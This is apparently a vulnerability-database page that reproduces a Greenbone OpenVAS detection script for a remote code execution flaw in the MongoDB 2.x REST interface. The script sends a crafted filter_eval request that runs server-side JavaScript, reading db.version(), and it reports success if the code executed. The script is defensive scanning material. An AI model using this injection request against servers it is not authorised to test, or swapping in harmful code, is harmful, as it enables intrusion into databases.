Lucene search
+L

MongoDB 2.x REST Interface RCE Vulnerability (Nov 2012) - Active Check

🗓️ 08 Jan 2014 00:00:00Reported by Copyright (C) 2014 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 22 Views

MongoDB REST Interface RCE Vulnerability. Remote code execution vulnerability

Refs
Code
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:mongodb:mongodb";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103870");
  script_version("2026-01-09T05:47:51+0000");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");

  script_name("MongoDB 2.x REST Interface RCE Vulnerability (Nov 2012) - Active Check");

  script_xref(name:"URL", value:"http://en.securitylab.ru/lab/PT-2012-40");
  script_xref(name:"URL", value:"http://blog.ptsecurity.com/2012/11/attacking-mongodb.html");

  script_tag(name:"last_modification", value:"2026-01-09 05:47:51 +0000 (Fri, 09 Jan 2026)");
  script_tag(name:"creation_date", value:"2014-01-08 13:56:18 +0100 (Wed, 08 Jan 2014)");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2014 Greenbone AG");
  script_dependencies("gb_mongodb_webadmin_http_detect.nasl");
  script_require_ports("Services/www", 28017);
  script_mandatory_keys("mongodb/webadmin/port");

  script_tag(name:"impact", value:"An attacker can exploit this vulnerability to execute arbitrary code
  within the context of the affected application.");

  script_tag(name:"vuldetect", value:"Send a special crafted HTTP GET request and check the response.");

  script_tag(name:"insight", value:"If an attacker manages to call the REST interface that is running on port 28017
  by default, the attacker could execute SSJS code.");

  script_tag(name:"solution", value:"Update your software up to the latest version or disable the REST interface.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"summary", value:"MongoDB is prone to a remote code execution (RCE) vulnerability
  because it fails to properly sanitize user-supplied input.");

  script_tag(name:"affected", value:"MongoDB 2.x is vulnerable.");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

if( ! port = get_app_port( cpe:CPE, service:"www" ) )
  exit( 0 );

if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
  exit( 0 );

vtstrings = get_vt_strings();
extra_check = '_' + vtstrings["lowercase_rand"];

url = '/admin/$cmd/?filter_eval=function%28%29%20{%20val=db.version%28%29;%20bar=val%2b%27' + extra_check  + '%27;%20return%20bar;%20}&limit=1';
req = http_get( item:url, port:port );
buf = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );
if( ! buf || 'REST is not enabled' >< buf )
  exit( 0 );

if( "total_rows" >< buf && "retval" >< buf && buf =~ '"retval"\\s*:\\s*"[0-9.]+' + extra_check ) {
  report = 'It was possible to execute SSJS code on the remote mongodb.\n\nRequested URL: ' + url + '\nResponse: \n=====\n' + buf + '\n=====';
  security_message( port:port, data:report );
  exit( 0 );
}

exit( 99 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation